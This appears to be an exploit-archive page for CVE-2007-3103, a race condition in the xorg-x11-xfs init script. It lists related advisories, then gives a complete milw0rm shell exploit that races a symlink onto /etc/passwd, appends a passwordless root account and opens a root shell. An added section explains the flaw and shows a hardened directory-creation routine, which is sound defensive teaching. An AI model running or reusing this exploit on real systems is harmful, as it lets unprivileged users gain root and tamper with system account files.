| Title | Published | Views | Family |
|---|---|---|---|
| X.Org xorg-x11-xfs <= 1.0.2-3.1 Local Race Condition Exploit | 21 Feb 2008 00:00 | – | zdt |
| CentOS 4 : xorg-x11 (CESA-2007:0519) | 18 Jul 2007 00:00 | – | nessus |
| CentOS 5 : xorg-x11-xfs (CESA-2007:0520) | 6 Jan 2010 00:00 | – | nessus |
| Debian DSA-1342-1 : xfs - race condition | 1 Aug 2007 00:00 | – | nessus |
| Fedora 10 : xorg-x11-xfs-1.0.5-3.1.fc10 (2009-3651) | 3 Jul 2009 00:00 | – | nessus |
| Fedora 9 : xorg-x11-xfs-1.0.5-2.1.fc9 (2009-3666) | 3 Jul 2009 00:00 | – | nessus |
| GLSA-200710-11 : X Font Server: Multiple Vulnerabilities | 15 Oct 2007 00:00 | – | nessus |
| Oracle Linux 4 : xorg-x11 (ELSA-2007-0519) | 12 Jul 2013 00:00 | – | nessus |
| Oracle Linux 5 : Moderate: / xorg-x11-xfs (ELSA-2007-0520) | 12 Jul 2013 00:00 | – | nessus |
| RHEL 4 : xorg-x11 (RHSA-2007:0519) | 18 Jul 2007 00:00 | – | nessus |

```sh
#!/bin/sh
# Xorg-x11-xfs Race Condition Vuln local root exploit (CVE-2007-3103)
#
# Another lame xploit by vl4dZ :)) works on redhat el5 and before
#
# $ id
# uid=1001(kecos) gid=1001(user) groups=1001(user)
# $ sh xfs-RaceCondition-root-exploit.sh
# [*] Generate large data file in /tmp/.font-unix
# [*] Wait for xfs service to be (re)started by root...
# [*] Hop, symlink created...
# [*] Launching root shell
# -sh-3.1# id
# uid=0(root) gid=0(root) groups=0(root)
# Vulnerable version is xorg-x11-xfs <= 1.0.2-3.1 and vulnerable code is
# located in the start() function of the /etc/init.d/xfs script:
# ...
# rm -rf $FONT_UNIX_DIR
# mkdir $FONT_UNIX_DIR
# chown root:root $FONT_UNIX_DIR
# chmod 1777 $FONT_UNIX_DIR
# ...
# I'm listening right now to nice free music:
# http://www.jamendo.com/fr/album/5919
FontDir="/tmp/.font-unix"
Zero=/dev/zero
Size=900000
if [ ! -d $FontDir ]; then
    printf "Is xfs running ?\n"
    exit 1
fi
cd /tmp
cat > sym.c << EOF
#include <unistd.h>
int main(){
for(;;){if(symlink("/etc/passwd","/tmp/.font-unix")==0)
{return 0;}}}
EOF
cc sym.c -o sym>/dev/null 2>&1
if [ $? != 0 ]; then
    printf "Error: Cant compile code"
    exit 1
fi
printf "[*] Generate large data file in $FontDir\n"
dd if=${Zero} of=${FontDir}/BigFile bs=1024 count=${Size}>/dev/null 2>&1
if [ $? != 0 ]; then
    printf "Error: cant create large file"
    exit 1
fi
printf "[*] Wait for xfs service to be (re)started by root...\n"
./sym
if [ $? != 0 ]; then
    printf "Error: code failed...\n"
    exit 1
fi
if [ -L /tmp/.font-unix ]; then
    printf "[*] Hop, symlink created...\n"
    printf "[*] Launching root shell\n"
    sleep 2
    rm -f /tmp/.font-unix
    echo "r00t::0:0::/:/bin/sh" >> /etc/passwd
fi
su - r00t
# milw0rm.com [2008-02-21]
```
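
The `start()` sequence quoted in the script header runs `chown` and `chmod` by path name inside world-writable `/tmp` without checking that `mkdir` succeeded, so a symlink occupying that name redirects both commands to its target. The following is an added example, not code from the original page or from the xfs package: it puts that sequence beside a fail-closed replacement and runs both in a scratch directory. The function names are hypothetical and the current uid:gid stands in for `root:root`.

```shell
#!/bin/sh
# Added example, not code from the xfs package. Runs unprivileged in a
# scratch directory; the current uid:gid stands in for root:root.
OWNER="$(id -u):$(id -g)"

# The page's start() steps after "rm -rf": each command resolves the path
# again and follows a symlink, and a failed mkdir is ignored.
create_dir_unsafe() {
    mkdir "$1" 2>/dev/null
    chown "$OWNER" "$1"
    chmod 1777 "$1"
}

# Hardened form: mkdir fails if the name is already taken (a symlink
# included) and -m sets the mode at creation, so nothing is applied by
# path afterwards. Any failure aborts start-up instead of continuing.
create_dir_safe() {
    if ! mkdir -m 1777 "$1" 2>/dev/null; then
        echo "refusing to use existing path: $1" >&2
        return 1
    fi
    # Defence in depth: confirm the result is a real directory.
    [ -d "$1" ] && [ ! -L "$1" ]
}

# Octal permission bits of a file (GNU stat, with BSD stat as fallback).
mode_of() {
    stat -c %a "$1" 2>/dev/null || stat -f %Lp "$1"
}

# Constructed scenario: a symlink already sits where the directory should
# go, pointing at a private file. Prints that file's mode afterwards.
demo() {
    scratch=$(mktemp -d) || return 1
    victim="$scratch/victim"
    : > "$victim" && chmod 600 "$victim"
    ln -s "$victim" "$scratch/.font-unix"
    "$1" "$scratch/.font-unix" 2>/dev/null || true   # judged by file mode
    mode_of "$victim"
    rm -rf "$scratch"
}

if [ "${1:-}" = "--demo" ]; then
    echo "unsafe:   victim mode $(demo create_dir_unsafe)"
    echo "hardened: victim mode $(demo create_dir_safe)"
fi
```

With the hardened form a pre-existing path makes the service fail to start, which is the signal an administrator should investigate rather than work around.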